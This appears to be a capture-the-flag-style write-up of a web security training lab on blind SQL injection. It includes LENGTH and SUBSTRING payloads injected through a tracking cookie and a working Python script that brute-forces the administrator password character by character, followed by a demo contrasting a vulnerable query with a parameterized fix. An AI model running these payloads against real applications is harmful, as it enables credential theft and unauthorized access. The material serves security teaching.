11 - Blind SQL injection with conditional responses
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Given: Injection point (TrackingId), Attack type (Blind), Message (Welcome back!), Table (users), Columns (username, password)
End goal: Log in as the administrator user
Let's start solving the lab by capturing the request in Burp. The initial request returns Welcome back! in the response -
As we know there is a blind SQLi in TrackingId: after putting ' in TrackingId, the response comes back without the Welcome back! message. This means that when the injected query evaluates to TRUE the page includes Welcome back!, and when it evaluates to FALSE (or errors) it does not.
To save time, we first extract the length of the administrator user's password, so we know how many positions to brute force. The following payload uses the LENGTH function to test one candidate length at a time - ' and LENGTH((SELECT password From users where username='administrator'))=1--
Use Burp Intruder to brute force the length value -
In the output we can see a difference in response length when the payload value becomes 20. The length of the response changed because of the Welcome back! message -
Now we have to brute force the password itself. If we start brute forcing the password manually or using Intruder, it takes a lot of time. So I created a simple Python script to brute force the characters of the password one position at a time.
(make sure to change the URL and cookie values before running)
import requests

# Change the URL and cookie values to match your own lab instance before running.
url = "https://0a940094031fb6c28083f8cc007800e4.web-security-academy.net"
# Character set tried at each password position (the lab password uses lowercase letters and digits).
char = "abcdefghijklmnopqrstuvwxyz1234567890"

def get_length():
    # Ask "is the password length equal to i?" for each i; the Welcome back! message means TRUE.
    for i in range(100):
        cookie = {'TrackingId': 'LxkaHGwAmYwD24wj', 'session': 'zeGgG4l7DacDnWTOR4LV6En1z9LIPG5Q'}
        payload = f"' and LENGTH((SELECT password From users where username='administrator'))={i}--"
        cookie['TrackingId'] += payload
        res = requests.get(url, cookies=cookie)
        if "Welcome back!" in res.text:
            return i
    return None

length = get_length()
print("[+] Length of the password is :", length)

def get_pass(lengt):
    # For each position 1..lengt, try every character until Welcome back! confirms the match.
    passwd = ""
    for i in range(1, lengt + 1):
        for c in char:
            cookie = {'TrackingId': 'LxkaHGwAmYwD24wj', 'session': 'zeGgG4l7DacDnWTOR4LV6En1z9LIPG5Q'}
            payload = f"' AND SUBSTRING((SELECT password FROM users where username='administrator'),{i},1)='{c}'--"
            cookie['TrackingId'] += payload
            res = requests.get(url, cookies=cookie)
            if "Welcome back!" in res.text:
                passwd += c
                break
    return passwd

print("[+] Password is :", get_pass(length))
Output:
Now we have the password of the administrator user; go to My account and log in with the above credentials to solve the lab.
Lab Solved:
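Why the conditional response leaks data, and what the fix looks like, as an added example that is not part of the original writeup or the lab's own code: the LENGTH payload used above is run against a constructed SQLite stand-in for the tracking-id lookup, once with the cookie value concatenated into the query text (the lab's behaviour) and once with it bound as a parameter. The table layout and the 20-character password are constructed for the demo.

```python
import sqlite3

# Constructed sample data standing in for the lab's database; not the real lab schema.
TRACKING_ID = "LxkaHGwAmYwD24wj"
ADMIN_PASSWORD = "q7x2m9pl4zr8vk1sd3wn"  # constructed value, 20 characters long

# Payloads from the writeup, appended to the valid tracking id exactly as the script does.
PAYLOAD_TRUE = TRACKING_ID + "' and LENGTH((SELECT password From users where username='administrator'))=20--"
PAYLOAD_FALSE = TRACKING_ID + "' and LENGTH((SELECT password From users where username='administrator'))=19--"

def make_db():
    """Build an in-memory database with a tracking table and the users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (id TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO tracking VALUES (?)", (TRACKING_ID,))
    conn.execute("INSERT INTO users VALUES ('administrator', ?)", (ADMIN_PASSWORD,))
    return conn

def welcome_back_vulnerable(conn, tracking_id):
    """Vulnerable lookup: the cookie value is pasted into the SQL text, so a quote in
    the cookie closes the string literal and the rest is parsed as SQL. Errors are
    swallowed, which matches the 'no error message' behaviour the lab shows."""
    sql = f"SELECT 1 FROM tracking WHERE id = '{tracking_id}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def welcome_back_hardened(conn, tracking_id):
    """Hardened lookup: the cookie value is bound as a parameter, so it is compared
    as data and can never change the structure of the query."""
    sql = "SELECT 1 FROM tracking WHERE id = ?"
    return conn.execute(sql, (tracking_id,)).fetchone() is not None

def compare(tracking_id):
    """Return (vulnerable_result, hardened_result) for one cookie value."""
    conn = make_db()
    return welcome_back_vulnerable(conn, tracking_id), welcome_back_hardened(conn, tracking_id)

if __name__ == "__main__":
    for name, value in [("valid id", TRACKING_ID), ("lone quote", TRACKING_ID + "'"),
                        ("length == 20", PAYLOAD_TRUE), ("length == 19", PAYLOAD_FALSE)]:
        vuln, safe = compare(value)
        print(f"{name:13} vulnerable={vuln!s:5} hardened={safe}")
```

Only the concatenated version answers TRUE for the "length == 20" probe, which is the one bit per request the Intruder run and the script above are collecting; the parameterized version treats every payload as a non-matching tracking id.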